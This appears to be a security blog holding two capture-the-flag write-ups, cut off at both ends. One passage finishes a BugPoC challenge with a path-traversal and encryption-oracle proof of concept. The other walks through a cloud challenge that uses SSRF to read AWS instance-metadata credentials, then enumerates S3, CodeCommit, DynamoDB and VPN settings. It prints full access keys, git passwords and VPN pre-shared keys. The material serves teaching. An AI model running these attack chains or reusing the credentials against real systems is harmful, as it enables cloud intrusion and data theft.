'TabError': <class 'TabError'>, 'LookupError': <class 'LookupError'>, 'IndexError': <class 'IndexError'>, 'KeyError': <class 'KeyError'>, 'ValueError': <class 'ValueError'>, 'UnicodeError': <class 'UnicodeError'>, 'UnicodeEncodeError': <class 'UnicodeEncodeError'>, 'UnicodeDecodeError': <class 'UnicodeDecodeError'>, 'UnicodeTranslateError': <class 'UnicodeTranslateError'>, 'AssertionError': <class 'AssertionError'>, 'ArithmeticError': <class 'ArithmeticError'>, 'FloatingPointError': <class 'FloatingPointError'>, 'OverflowError': <class 'OverflowError'>, 'ZeroDivisionError': <class 'ZeroDivisionError'>, 'SystemError': <class 'SystemError'>, 'ReferenceError': <class 'ReferenceError'>, 'MemoryError': <class 'MemoryError'>, 'BufferError': <class 'BufferError'>, 'Warning': <class 'Warning'>, 'UserWarning': <class 'UserWarning'>, 'DeprecationWarning': <class 'DeprecationWarning'>, 'PendingDeprecationWarning': <class 'PendingDeprecationWarning'>, 'SyntaxWarning': <class 'SyntaxWarning'>, 'RuntimeWarning': <class 'RuntimeWarning'>, 'FutureWarning': <class 'FutureWarning'>, 'ImportWarning': <class 'ImportWarning'>, 'UnicodeWarning': <class 'UnicodeWarning'>, 'BytesWarning': <class 'BytesWarning'>, 'ResourceWarning': <class 'ResourceWarning'>, 'ConnectionError': <class 'ConnectionError'>, 'BlockingIOError': <class 'BlockingIOError'>, 'BrokenPipeError': <class 'BrokenPipeError'>, 'ChildProcessError': <class 'ChildProcessError'>, 'ConnectionAbortedError': <class 'ConnectionAbortedError'>, 'ConnectionRefusedError': <class 'ConnectionRefusedError'>, 'ConnectionResetError': <class 'ConnectionResetError'>, 'FileExistsError': <class 'FileExistsError'>, 'FileNotFoundError': <class 'FileNotFoundError'>, 'IsADirectoryError': <class 'IsADirectoryError'>, 'NotADirectoryError': <class 'NotADirectoryError'>, 'InterruptedError': <class 'InterruptedError'>, 'PermissionError': <class 'PermissionError'>, 'ProcessLookupError': <class 'ProcessLookupError'>, 'TimeoutError': <class 'TimeoutError'>, 'open': <built-in function open>, 'quit': Use quit() or Ctrl-D (i.e. EOF) to exit, 'exit': Use exit() or Ctrl-D (i.e. EOF) to exit, 'copyright': Copyright (c) 2001-2021 Python Software Foundation.\\nAll Rights Reserved.\\n\\nCopyright (c) 2000 BeOpen.com.\\nAll Rights Reserved.\\n\\nCopyright (c) 1995-2001 Corporation for National Research Initiatives.\\nAll Rights Reserved.\\n\\nCopyright (c) 1991-1995 Stichting Mathematisch Centrum, Amsterdam.\\nAll Rights Reserved., 'credits':     Thanks to CWI, CNRI, BeOpen.com, Zope Corporation and a cast of thousands\\n    for supporting Python development.  See www.python.org for more information., 'license': Type license() to see the full license text, 'help': Type help() for interactive help, or help(object) for help about object.};json,53,<module 'json' from '/var/lang/lib/python3.8/json/__init__.py'>;sys,52,<module 'sys' (built-in)>;SECRET_API_KEY,63,flag{gr8_job_h@cker};get_memory,59,<function get_memory at 0x7f9e03fb1160>;verify_internal_request,72,<function verify_internal_request at 0x7f9e03fb1280>;lambda_handler,63,<function lambda_handler at 0x7f9e03fb1310>;\""}

Near the end of the heap dump, we see the flag :)

Solution

To summarise, the following observations and steps were led us to the flag:

  1. There is an internal endpoint (found through fuzzing) at /heapdump that dumps memory, including SECRET_API_KEY variable which contains the flag.
  2. The publicly-accessible /get-dogs endpoint appends the decrypted x-param header value in the requested path as such: '/dogs' + decrypt(request.headers['x-param']).
  3. The publicly-accessible /fingerprint endpoint generates the encrypted value of: {"UA": request.headers["User-Agent"]}, which gives rise to an encryption oracle.
  4. Although the /get-dogs endpoint has some prevention against path traversal (e.g. stripping ../ from the request path), it is still possible to achieve path traversal using URL-encoding / to %2f.
  5. Leveraging /fingerprint endpoint to generate the encrypted value of a path traversal payload, and supplying the generated fingerprint as the x-param header in the /get-dogs endpoint allows us to access the internal /heapdump endpoint and leak the flag.

For a valid solution submission, participants need to submit a proof-of-concept (PoC) hosted on BugPoC.
For simplicity, I opted to use their Python PoC to demonstrate the attack chain:

#!/usr/bin/env python3
import re
import requests

def main():
  endpoint = '/heapdump'
  path_traversal_payload = ('/..' + endpoint + '#').replace('/', '%2f')
  encrypted = requests.get('https://doggo-api.buggywebsite.com/fingerprint', headers={'User-Agent': path_traversal_payload}).json()['fingerprint']
  r = requests.get('https://doggo-api.buggywebsite.com/get-dogs', headers={'x-param': encrypted, 'x-fingerprint': 'a'})
  flag = re.search('SECRET_API_KEY[^;]+', r.text).group().split(',')
  flag[1] = ': '
  return ''.join(flag)

Running the proof-of-concept code using BugPoC’s Python PoC returns the following response containing the flag:

SECRET_API_KEY: flag{gr8_job_h@cker}

Memory Leak Proof-of-Concept

Challenge solved! :tada:

Closing Thoughts & Tips

As you might have noted by now, it is never a good idea to re-use the same encryption key for multiple purposes. An attacker who has access to encryption/decryption oracle can potentially trigger unintentional behaviours (as well-demonstrated in this challenge). There were a couple of times I observed the re-use of JWT signing key for both production and staging servers, which can be leveraged to achieve account takeover on the production server! :wink:

There are also a few tricks we can use to perform better testing, which I did not mention in the write-up for brevity. Firstly, we were hunting endpoints from an external perspective. In addition to fuzzing endpoints from an external perspective, the path traversal bug in the server-side request to discover endpoints should also be leveraged to fuzz from the internal perspective.

Next, the path traversal payload (i.e. ..%2f) was specifically targeting the webserver’s URL path normalisation behaviour. Do note that there is no guarantee that it will work in real life, because we can’t know for sure which webserver is actually being used on the backend! There could be multiple reverse proxies used, or there could be none at all – it all depends, and we can only enumerate and do a bit of guessing-and-checking to confirm our suspicions!

Another thing we could have done is to leverage the /fingerprint endpoint to identify how the request is being fetched by the application:

$ curl -s -H 'User-Agent: /..%2ffingerprint#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkv0VCFdQy6oMxc1yJDY2WYHSKloG6Ik-OXHQ4Bw9CjgmAiO9j71e8rP_mJ0MM989mlsUiAlZaoPwsHr7vBd8a-E3tteAm4j4XJ1ASyXYJULa5-Y=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/..%2ffingerprint#\"}", "statusCode": 200, "body": "{\"fingerprint\": \"gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU\"}"}
$ curl -H "x-fingerprint: actually this value isn't validated" -H "x-param: gAAAAABgkv0bO6yEXGQL8R9ddHZiEQe4Twv6-3ASNLhIZmWPSLXl833cuoiE_JrcIHgEBa54X5cWiqpoHvVT_GQBqkdPFXwOviKnz5BWdcEReMrlMI0sH672s2Hf_3Gxy1xUpJQwEAKU" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"python-requests/2.22.0\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

From the User-Agent string, we can infer that the URL is likely to be fetched using Requests Python library on the sever-side. We could also possibly examine and target a specific behaviour of the HTTP client used in our attack as well. For instance, did you know that urllib accepts “wrapped” URLs? Check out this writeup by @Gladiator to see how this behaviour was being used to bypass a WAF in a CTF challenge!

I hope you enjoyed the write-up. :smiley:
Thanks BugPoC/@NahamSec for the fun challenge!

Here’s my write-up on yet another cloud challenge with no solves titled Keep The Clouds Together... in STACK the Flags 2020 CTF organized by Government Technology Agency of Singapore (GovTech)’s Cyber Security Group (CSG).

If you are new to cloud security, do check out my write-up for Share and Deploy the Containers cloud challenge before continuing on.

The attack path for this challenge is much longer and complex than the other cloud challenges in the competition, further highlighting the difficulties in penetration testing of infrastructures involving multiple cloud computing vendors.

Once again, shoutouts to Tan Kee Hock from GovTech’s CSG for putting together this challenge!

Keep the Clouds Together…

Description:
The recent arrest of an agent from COViD revealed that the punggol-digital-lock.com was part of the massive scam campaign targeted towards the citizens! It provided a free document encryption service to the citizens and now the site demands money to decrypt the previously encrypted files! Many citizens fell prey to their scheme and were unable to decrypt their files! We believe that the decryption key is broken up into parts and hidden deep within the system!

Notes - https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt

Introduction

The note at https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/notes-to-covid-developers.txt has the following content:

Please get your act together. The site that is supposed load the list of affected individuals is not displaying properly.
index.html is not loading the users as expected.
For your convenience, I have also generated your git credentials. See me.

- COViD

Notice that the note is hosted on an Amazon S3 Bucket in ap-southeast-1 region named punggol-digital-lock-portal. From the note, we can learn there is a index.html object in the punggol-digital-lock-portal S3 bucket and we should be looking for git credentials somewhere.

Let’s navigate to https://punggol-digital-lock-portal.s3-ap-southeast-1.amazonaws.com/index.html: S3 Bucket /index.html

As what the notes mentioned, the list of affected individuals indeed failed to load.
Let’s take a peek at the JavaScript code included by the webpage:

1
2
3
4
5
6
7
8
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://122.248.230.66/http://127.0.0.1:8080/dump-data", false);
xhttp.send();
var data = (JSON.parse(xhttp.responseText)).data;
for (i = 0; i < data.length; i++) {
    output = "<tr><td>" + (i+1) + "</td><td>" + data[i].name + "</td><td>" + data[i].no_of_files + "</td><td>" + data[i].total_file_size + "</td><td>" + Math.ceil(data[i].cash_bounty) + "</td></tr>";
document.write(output);
}

The page attempts to fetch a JSON containing the list of affected individuals from an IP address 122.248.230.66 belonging to Amazon Elastic Computing (EC2).

cors-anywhere = SSRF to Anywhere

If we navigate to http://122.248.230.66/, we can see the following response:

This API enables cross-origin requests to anywhere.

Usage:

/               Shows help
/iscorsneeded   This is the only resource on this host which is served without CORS headers.
/<url>          Create a request to <url>, and includes CORS headers in the response.

If the protocol is omitted, it defaults to http (https if port 443 is specified).

Cookies are disabled and stripped from requests.

Redirects are automatically followed. For debugging purposes, each followed redirect results
in the addition of a X-CORS-Redirect-n header, where n starts at 1. These headers are not
accessible by the XMLHttpRequest API.
After 5 redirects, redirects are not followed any more. The redirect response is sent back
to the browser, which can choose to follow the redirect (handled automatically by the browser).

The requested URL is available in the X-Request-URL response header.
The final URL, after following all redirects, is available in the X-Final-URL response header.


To prevent the use of the proxy for casual browsing, the API requires either the Origin
or the X-Requested-With header to be set. To avoid unnecessary preflight (OPTIONS) requests,
it's recommended to not manually set these headers in your code.


Demo          :   https://robwu.nl/cors-anywhere.html
Source code   :   https://github.com/Rob--W/cors-anywhere/
Documentation :   https://github.com/Rob--W/cors-anywhere/#documentation

This indicates that the cors-anywhere proxy application is being deployed, allowing us to be able to perform Server-Side Request Forgery (SSRF) attacks. When browsing to http://122.248.230.66/http://127.0.0.1:8080/dump-data, we get the following error message:

Not found because of proxy error: Error: connect ECONNREFUSED 127.0.0.1:8080

This indicates that the port 8080 appears to be inaccessible, hence the list of victims could not be loaded successfully.
Perhaps, the webserver is not even hosted locally!

Since we have identified the IP address 122.248.230.66 is an AWS EC2 instance, we can leverage the SSRF vulnerability to fetch information such as temporary IAM access keys from AWS Instance Metadata service:

$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/
punggol-digital-lock-service
$ curl http://122.248.230.66/http://169.254.169.254/latest/meta-data/iam/security-credentials/punggol-digital-lock-service
{
  "Code" : "Success",
  "LastUpdated" : "2020-12-09T21:53:30Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4I6UNNJLGGSBLNBE",
  "SecretAccessKey" : "1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7",
  "Token" : "IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==",
  "Expiration" : "2020-12-10T04:13:44Z"
}

Great! We have successfully obtained temporary security credentials for punggol-digital-lock-service assumed role user.
Here’s a quick recap on our progress before we continue on: Initial Entrypoint Progress

Enumerating punggol-digital-lock-service Role

I used WeirdAAL to automate the enumerate the permitted actions for the assumed role user user and AWS CLI v1.

$ cat ~/.aws/credentials
[default]
aws_access_key_id = ASIA4I6UNNJLGGSBLNBE
aws_secret_access_key = 1Hs4gJ1DHlOn6sNYJ6CtwJFMj9L6U+GJV/0Av5Q7
aws_session_token = IQoJb3JpZ2luX2VjEM7//////////wEaDmFwLXNvdXRoZWFzdC0xIkcwRQIhAJgswJ1LBujtBko8u03aQkzuVtJTFlHB/dTP3UgTDv3aAiBe7wD5quvPKBFUX2qdJKnCyMxNKjIgKEKc2do3jczakCq+AwhnEAAaDDg0Mzg2OTY3ODE2NiIMJlawVwTJAsubX6TqKpsD05mftdNYOX+Ah24OPCzBrzduIdKECcoUyux2ZkLc5LSXiGEFvowOW9heGnHBFXc1AWn1sKszOUC26vZxDO9cgItbd42KpzmRWE+wuplxwycObf6MkX8Yx0li8ARgHMduOT+PmCQMKX65lrTRUrc/RPgWet9shjrnCAr5jlOyedfOWH5nlnvSXpCvoOJ2jOatkO/8Xppp7D9yPtRTeEt9dhmJ7gBzLqiiGckTOLL2bouOYi5j9qzBC67c79t0eoSXGz81ef9+M2tXLZX8M++1t1eQjzomTomXXsgZaRQNIRSimAr2y2I6mIXYkXU4fq3DgJ8yUe3y0Nmch3Jk+8lMD5aH+R0voRxckzx5O3NZ3+E4gGkRoW8luR3O7andLR8aO4gaIpNIaC60sXrYaLUsg9B6Ihtk50ysuPXY+y8K3OgbG9CdHnoHzaCN93/7A/sWqVWIgaMUtrnZzoIGIh9NDqsjRipA7M3OsF7ALkhx6nBiifyehd6gt9oPsBV66OWxf3pZOQ4aPqxlZAlGuScfa4s09SdDl6sXYW0cMKuOxf4FOusB/n6uszhbbXM82FGtdR9m55oU/M/3cgkYgAxnELjR28Hbv0CYLqiEgppoGY3s9gd3SL8Tuq5gGrB38/mzlLmXDiLgqXxexrj87GEq671Th6+CMsuklxjlAs/BBuh2oUQvWIgs9kd1PayLiuRqrTPY33+RDPo1lJJgUvWnTP67PlMBwvUWukdtA1I7opJW8AybRYZtBdBHV7uWSvz4M8l6rpJFzLiAPhC2ob8M4J4aQtG3HVIYyk69QxpzkCCKgt5dwkmjQLUlKjBBfutzYHbhAc5TH4ysaydt6J2E0JbmiVhwNqdB7lCvWADQMw==

$ aws sts get-caller-identity
{
    "UserId": "AROA4I6UNNJLJABU4K2VW:i-0da9e688ab9264a5e",
    "Account": "843869678166",
    "Arn": "arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e"
}

$ cp ~/.aws/credentials .env

$ python3 weirdAAL.py -m recon_all -t punggol-digital-lock-service
...

$ python3 weirdAAL.py -m list_services_by_key -t punggol-digital-lock-service
[+] Services enumerated for ASIA4I6UNNJLIWT435IG [+]
codecommit.ListRepositories
dynamodb.ListTables
ec2.DescribeRouteTables
ec2.DescribeVpnConnections
elasticbeanstalk.DescribeApplicationVersions
elasticbeanstalk.DescribeApplications
elasticbeanstalk.DescribeEnvironments
elasticbeanstalk.DescribeEvents
opsworks.DescribeStacks
route53.ListGeoLocations
s3.ListBuckets
sts.GetCallerIdentity

We can see a few interesting permitted actions, namely:

  • codecommit.ListRepositories relating to git repositories
  • dynamodb.ListTables relating to NoSQL databases
  • ec2.DescribeRouteTables relating to network routing tables of the Virtual Private Cloud (VPC)
  • ec2.DescribeVpnConnections relating to VPN tunnels
  • s3.ListBuckets relating to S3 buckets

Since we started the challenge from a note residing in an Amazon S3 bucket, let’s proceed to enumerate that first.

Getting git Credentials

First, we try to list all S3 buckets:

$ aws s3 ls
2020-11-21 18:36:15 punggol-digital-lock-portal

Seems like there’s only one bucket. Let’s list the objects in the S3 bucket:

$ aws s3 ls s3://punggol-digital-lock-portal/
2020-11-21 19:22:44       2513 index.html
2020-11-21 19:22:44        253 notes-to-covid-developers.txt
2020-11-21 20:37:57        274 some-credentials-for-you-lazy-bums.txt

There is a hidden file some-credentials-for-you-lazy-bums.txt in the punggol-digital-lock-portal S3 bucket!
Let’s fetch the hidden file:

$ aws s3 cp s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt .
download: s3://punggol-digital-lock-portal/some-credentials-for-you-lazy-bums.txt to ./some-credentials-for-you-lazy-bums.txt

The file some-credentials-for-you-lazy-bums.txt contains the following content:

covid-developer-at-843869678166
TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=

Use these credentials that I have provisioned for you! The other internal web application is still under development.
The other network engineers are busy getting our networks connected.

Great! We obtained git credentials successfully. I wonder where we can use them… :thinking:

git Those Repositories

That’s right! We can use it to access git repositories hosted on AWS CodeCommit source control service.

Let’s first list all AWS CodeCommit repositories:

$ aws codecommit list-repositories
{
    "repositories": [
        {
            "repositoryName": "punggol-digital-lock-api",
            "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105"
        },
        {
            "repositoryName": "punggol-digital-lock-cors-server",
            "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e"
        }
    ]
}

Two code repositories are found. Let’s get more details of the respective repositories:

$ aws codecommit get-repository --repository-name punggol-digital-lock-api
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "316c639b-7378-4574-841c-a60ae0f37105",
        "repositoryName": "punggol-digital-lock-api",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985979.053,
        "creationDate": 1605985614.824,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-api"
    }
}

$ aws codecommit get-repository --repository-name punggol-digital-lock-cors-server
{
    "repositoryMetadata": {
        "accountId": "843869678166",
        "repositoryId": "fda2854e-c5b0-4e06-8534-ab8e1e84454e",
        "repositoryName": "punggol-digital-lock-cors-server",
        "defaultBranch": "master",
        "lastModifiedDate": 1605985991.35,
        "creationDate": 1605985592.865,
        "cloneUrlHttp": "https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "cloneUrlSsh": "ssh://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server",
        "Arn": "arn:aws:codecommit:ap-southeast-1:843869678166:punggol-digital-lock-cors-server"
    }
}

Grab the two git clone URLs and fetch the two code repositories:

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-cors-server
Cloning into 'punggol-digital-lock-cors-server'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 8, done.
Unpacking objects: 100% (8/8), done.

$ git clone https://git-codecommit.ap-southeast-1.amazonaws.com/v1/repos/punggol-digital-lock-api
Cloning into 'punggol-digital-lock-api'...
Username for 'https://git-codecommit.ap-southeast-1.amazonaws.com': covid-developer-at-843869678166
Password for 'https://covid-developer-at-843869678166@git-codecommit.ap-southeast-1.amazonaws.com': TQyWYsSH+DTixfvF9DpuZsK4aybi5zeUYpCS1ZujxOE=
remote: Counting objects: 7, done.
Unpacking objects: 100% (7/7), done.

Awesome! We now have both code repositories.

At this point, the punggol-digital-lock-api repository definitely sounds more interesting since we know that punggol-digital-lock-cors-server is likely to be the cors-anywhere proxy application, so let’s look at the punggol-digital-lock-api repository first.

Getting to the Database

In the punggol-digital-lock-api repository, there is a Node.js application.

The source code of index.js is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
var express = require('express')
var app = express()
var cors = require('cors');
var AWS = require("aws-sdk");
var corsOptions = {
    origin: 'http://punggol-digital-lock.internal',
    optionsSuccessStatus: 200 // some legacy browsers (IE11, various SmartTVs) choke on 204
}
AWS.config.loadFromPath('./node_config.json');
var ddb = new AWS.DynamoDB({ apiVersion: '2012-08-10' });
let dataStore = [];

const download_data = () => {
    return new Promise((resolve, reject) => {
        try {
            var params = {
                ExpressionAttributeValues: {
                    ':id': { N: '101' }
                },
                FilterExpression: 'id < :id',
                TableName: 'citizens'
            };
            ddb.scan(params, function (err, data) {
                if (err) {
                    console.log("Error", err);
                    return reject(null);
                } else {
                    results = []
                    data.Items.forEach(function (element, index, array) {
                        results.push({
                            'no_of_files': element.no_of_files.N,
                            'cash_bounty': element.cash_bounty.N,
                            'id': element.id.N,
                            'name': element.name.S,
                            'total_file_size': element.total_file_size.N
                        });
                    });
                    return resolve(results);
                }
            });
        } catch (err) {
            console.error(err);
        }
    });

}

async function boostrap() {
    dataStore = await download_data();
}

boostrap();

app.get('/dump-data', cors(corsOptions), function (req, res, next) {
    res.json({ data: dataStore });
})
app.listen(8080, function () {
    console.log('punggol-digital-lock-api server running on port 8080')
})

We can observe that there is an internal hostname punggol-digital-lock.internal and that the application fetches the list of victim users from an Amazon DynamoDB NoSQL database. Taking a closer look at the code, we can also see that the table name is citizens and that the code executes ddb.scan() to fetch records with id < 101.

Scanning the Flag from DynamoDB

Let’s try to enumerate the Amazon DynamoDB NoSQL database further.

$ aws dynamodb list-tables
{
    "TableNames": [
        "citizens"
    ]
}

Looks like there’s only one table citizens in the DynamoDB. Let’s try to query it and fetch all records except id = 0:

$ aws dynamodb query --table-name "citizens" --key-condition-expression 'id > :id' --expression-attribute-values '{":id":{"N":"0"}}'

An error occurred (AccessDeniedException) when calling the Query operation: User: arn:aws:sts::843869678166:assumed-role/punggol-digital-lock-service/i-0da9e688ab9264a5e is not authorized to perform: dynamodb:Query on resource: arn:aws:dynamodb:ap-southeast-1:843869678166:table/citizens

Unfortunately, we don’t have the permission to do so. Instead of performing the query operation, let’s try using the scan operation to dump the table contents instead:

$ aws dynamodb scan --table-name citizens | wc -l
1724

That worked! That’s quite a bit of data to sieve through, so let’s grep for the flag in the JSON output:

$ aws dynamodb scan --table-name citizens | grep -A 5 -B 11 govtech
{
    "no_of_files": {
        "N": "0"
    },
    "cash_bounty": {
        "N": "0"
    },
    "id": {
        "N": "10000"
    },
    "name": {
        "S": "govtech-csg{Mult1_Cl0uD_"
    },
    "total_file_size": {
        "N": "0"
    }
},

And we successfully get the first half of the flag: govtech-csg{Mult1_Cl0uD_ :smile:
Before we continue to find the second half of the flag, let’s take a quick look at our progress at the moment:

Midpoint of Attack Path

VPN Subnet Routing

Now what? We still have not looked at the punggol-digital-lock-cors-server code repository yet.

As expected, there is an Node.js application basically creating a cors-anywhere proxy at index.js:

1
2
3
4
5
6
7
8
9
10
11
12
// Listen on a specific host via the HOST environment variable
var host = '0.0.0.0';
// Listen on a specific port via the PORT environment variable
var port = 80;
var cors_proxy = require('cors-anywhere');
cors_proxy.createServer({
    originWhitelist: [], // Allow all origins
    setHeaders: {'x-requested-with': 'cors-server'},
    removeHeaders: ['cookie']
}).listen(port, host, function() {
    console.log('cors-server running on ' + host + ':' + port);
});

More importantly, there’s a note.txt:

Allow requests to be proxied to reach internal networks. Current network has routing enabled to the other VPN subnets.

That’s interesting. If the current network has routing to the other VPN subnets, perhaps we can access hosts on the other network too!
Which reminds me, we haven’t checked out the output for the permitted actions – ec2.DescribeRouteTables and ec2.DescribeVpnConnections – just yet, so let’s do that now:

$ aws ec2 describe-vpn-connections
{
    "VpnConnections": [
        {
            "CustomerGatewayConfiguration": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<vpn_connection id=\"vpn-071d320b1122f4c0e\">\n  <customer_gateway_id>cgw-025dc69154fd5cf91</customer_gateway_id>\n  <vpn_gateway_id>vgw-03a9749df3e682e4b</vpn_gateway_id>\n  <vpn_connection_type>ipsec.1</vpn_connection_type>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.118</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.23.247</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.9.117</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>lROuGqp0zYsQ5PjyJNHlKTFQPz0apIn4</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n  <ipsec_tunnel>\n    <customer_gateway>\n      <tunnel_outside_address>\n        <ip_address>34.87.151.253</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.238</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>65000</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </customer_gateway>\n    <vpn_gateway>\n      <tunnel_outside_address>\n        <ip_address>54.254.251.166</ip_address>\n      </tunnel_outside_address>\n      <tunnel_inside_address>\n        <ip_address>169.254.242.237</ip_address>\n        <network_mask>255.255.255.252</network_mask>\n        <network_cidr>30</network_cidr>\n      </tunnel_inside_address>\n      <bgp>\n        <asn>64512</asn>\n        <hold_time>30</hold_time>\n      </bgp>\n    </vpn_gateway>\n    <ike>\n      <authentication_protocol>sha1</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>28800</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>main</mode>\n      <pre_shared_key>.BFZUutUl7Y3jA91vU9K6te5y_Q_VM7f</pre_shared_key>\n    </ike>\n    <ipsec>\n      <protocol>esp</protocol>\n      <authentication_protocol>hmac-sha1-96</authentication_protocol>\n      <encryption_protocol>aes-128-cbc</encryption_protocol>\n      <lifetime>3600</lifetime>\n      <perfect_forward_secrecy>group2</perfect_forward_secrecy>\n      <mode>tunnel</mode>\n      <clear_df_bit>true</clear_df_bit>\n      <fragmentation_before_encryption>true</fragmentation_before_encryption>\n      <tcp_mss_adjustment>1379</tcp_mss_adjustment>\n      <dead_peer_detection>\n        <interval>10</interval>\n        <retries>3</retries>\n      </dead_peer_detection>\n    </ipsec>\n  </ipsec_tunnel>\n</vpn_connection>",
            "CustomerGatewayId": "cgw-025dc69154fd5cf91",
            "Category": "VPN",
            "State": "available",
            "Type": "ipsec.1",
            "VpnConnectionId": "vpn-071d320b1122f4c0e",
            "VpnGatewayId": "vgw-03a9749df3e682e4b",
            "Options": {
